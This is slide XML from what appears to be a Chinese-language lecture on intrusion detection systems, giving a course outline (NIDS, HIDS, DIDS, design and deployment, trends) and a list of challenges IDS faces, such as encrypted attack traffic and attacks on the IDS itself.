                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2BBEC0-744D-4D63-A1D7-D3EF3C0B5C61}"/>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0AFCDB31-7A42-4D30-973E-C7696D19502E}"/>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02</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FFEE7EAF-90BC-43F6-B7C2-088D4C3BCA4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原理和主要方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EFCCFF-6C07-4C65-8ED3-5FFF91FBAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="3420000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="组合 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6066EB41-F32C-45C4-99C1-0918D8C5174D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="矩形: 圆角 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14524E7A-B812-4FB1-9D63-990CF664AB3A}"/>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86134F92-3E5A-4DE8-A8AE-9BB2DCB1B79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03</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DE2AA675-157B-45F1-8702-9486056053C1}"/>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NIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>HIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>DIDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF4BA50-6F79-4FE0-BB85-8085EE0839A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3600000" y="4320000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0402F17D-9F88-4B2E-A2AA-6923F05BD2EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="矩形: 圆角 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650FD5F4-700F-4B0F-A2B8-16032AC000BF}"/>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8F3D8D06-0624-458B-A28D-DE6AA2A8DE26}"/>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04</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0A859A2D-CD96-4333-A77B-BDB862C2EA42}"/>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IDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>设计和部署</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ECB501-4561-4A8B-88BE-E5161D7F9B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="5220000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="组合 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242A2424-D0A6-4827-88BE-67EAB3DBF146}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="矩形: 圆角 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECDEF9F-D729-4403-B8DA-D4E751BBA199}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1442977" y="2200774"/>
                <a:ext cx="5184161" cy="600299"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="31000">
                    <a:srgbClr val="1659B5"/>
                  </a:gs>
                  <a:gs pos="85000">
                    <a:srgbClr val="153B9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8214CB29-1AB2-4F17-9C41-BEA3D489A22A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1475321" y="2228867"/>
                <a:ext cx="711155" cy="5441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rPr>
                  <a:t>05</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="153B95"/>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257C772-5D23-4601-A412-371CC7099EA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2517106" y="2037878"/>
              <a:ext cx="4134772" cy="447729"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr lvl="0">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accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>IDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>发展趋势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="标题 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB32422-F32E-444F-8DBA-2CC4A9ADFB3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>讲 入侵检测技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2126467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40049" y="1259874"/>
            <a:ext cx="9539799" cy="1080135"/>
            <a:chOff x="1936" y="1532"/>
            <a:chExt cx="14282" cy="1701"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3283" y="1816"/>
              <a:ext cx="12935" cy="11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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>攻击手段</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>更为复杂精致，攻击目标更大范围</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1936" y="1532"/>
              <a:ext cx="1617" cy="1701"/>
              <a:chOff x="3789" y="2856"/>
              <a:chExt cx="1617" cy="1701"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="图片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789" y="2856"/>
                <a:ext cx="1617" cy="1701"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4328" y="3310"/>
                <a:ext cx="539" cy="79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29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1440039" y="1979929"/>
            <a:ext cx="9539905" cy="1080135"/>
            <a:chOff x="2020" y="1696"/>
            <a:chExt cx="12216" cy="1701"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3172" y="1980"/>
              <a:ext cx="11064" cy="11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solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>入侵者采用加密手段传输攻击信息</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="组合 37"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2020" y="1696"/>
              <a:ext cx="1383" cy="1701"/>
              <a:chOff x="3873" y="3020"/>
              <a:chExt cx="1383" cy="1701"/>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3" y="3020"/>
                <a:ext cx="1383" cy="1701"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4334" y="3472"/>
                <a:ext cx="461" cy="79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4" name="组合 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28997A5F-3DD2-48A3-AA53-32FB3103A69A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1439918" y="2701212"/>
            <a:ext cx="9540082" cy="1080135"/>
            <a:chOff x="1439918" y="2701212"/>
            <a:chExt cx="9540082" cy="1080135"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2340000" y="2880000"/>
              <a:ext cx="8640000" cy="720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solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>日益增长的网络流量导致检测分析难度加大</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="47" name="组合 46"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1439918" y="2701212"/>
              <a:ext cx="1079881" cy="1080135"/>
              <a:chOff x="3809" y="3122"/>
              <a:chExt cx="1436" cy="1701"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="48" name="图片 47"/>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809" y="3122"/>
                <a:ext cx="1436" cy="1701"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4288" y="3574"/>
                <a:ext cx="479" cy="79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5" name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63952123-3199-4078-B473-A582A609F9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1440272" y="3420074"/>
            <a:ext cx="9539759" cy="1080135"/>
            <a:chOff x="1440272" y="3420074"/>
            <a:chExt cx="9539759" cy="1080135"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="52" name="组合 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB869F95-00D6-6DB3-3C60-FF0252D1378D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1440272" y="3420074"/>
              <a:ext cx="9539759" cy="1080135"/>
              <a:chOff x="1136" y="1959"/>
              <a:chExt cx="13097" cy="1701"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4110B6ED-4869-B593-664F-F274DA178F7E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2371" y="2242"/>
                <a:ext cx="11862" cy="11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solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>不适当的自动响应机制</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="55" name="图片 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39168811-0F59-CB8C-E599-46FDDE7A7CB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36" y="1959"/>
                <a:ext cx="1483" cy="1701"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01BF8EC7-0259-DCB0-7E37-A3CC69889997}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1800000" y="3708000"/>
              <a:ext cx="360000" cy="504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nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4102E640-8C1D-4E1D-8CA9-2237C1A87ABB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1439836" y="4139723"/>
            <a:ext cx="9540488" cy="1080135"/>
            <a:chOff x="1439836" y="4139723"/>
            <a:chExt cx="9540488" cy="1080135"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="43" name="组合 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD3D456-1F6C-3357-A6FA-333A7090B8C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1439836" y="4139723"/>
              <a:ext cx="9540488" cy="1080135"/>
              <a:chOff x="1165" y="2101"/>
              <a:chExt cx="13098" cy="1701"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AF93841-96F1-6F5E-7BA1-6AD0E80ABEA0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2401" y="2385"/>
                <a:ext cx="11862" cy="11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solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>存在对入侵检测系统自身的攻击</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="51" name="图片 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4697E84-8354-42EF-2167-93F12BDFBD7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65" y="2101"/>
                <a:ext cx="1483" cy="1701"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEEDE25B-D0F0-054F-4D72-A69444278106}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1800000" y="4428000"/>
              <a:ext cx="360000" cy="504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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E44A9FAB-88C0-4231-823C-832D8673FEA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1440272" y="4860007"/>
            <a:ext cx="9539759" cy="1080135"/>
            <a:chOff x="1440272" y="4860007"/>
            <a:chExt cx="9539759" cy="1080135"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="54" name="组合 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A06BE3D7-8D5C-6DE8-3D53-696315D04D7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1440272" y="4860007"/>
              <a:ext cx="9539759" cy="1080135"/>
              <a:chOff x="1136" y="2244"/>
              <a:chExt cx="13097" cy="1701"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39211BC3-2817-F531-8468-DEC068B48552}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2371" y="2527"/>
                <a:ext cx="11862" cy="113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2800" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>交换方法限制了网络数据的可见性</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="60" name="图片 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{795B754E-C65A-9938-E2FC-91C1F176184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36" y="2244"/>
                <a:ext cx="1483" cy="1701"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060F78D2-721B-47C2-CACC-74F266787B18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1800000" y="5148000"/>
              <a:ext cx="360000" cy="504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ctr"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6</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B441BDA-DA4A-4D7E-8F37-DC99FBA0C83E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5.1 IDS</a:t>
            </a:r>
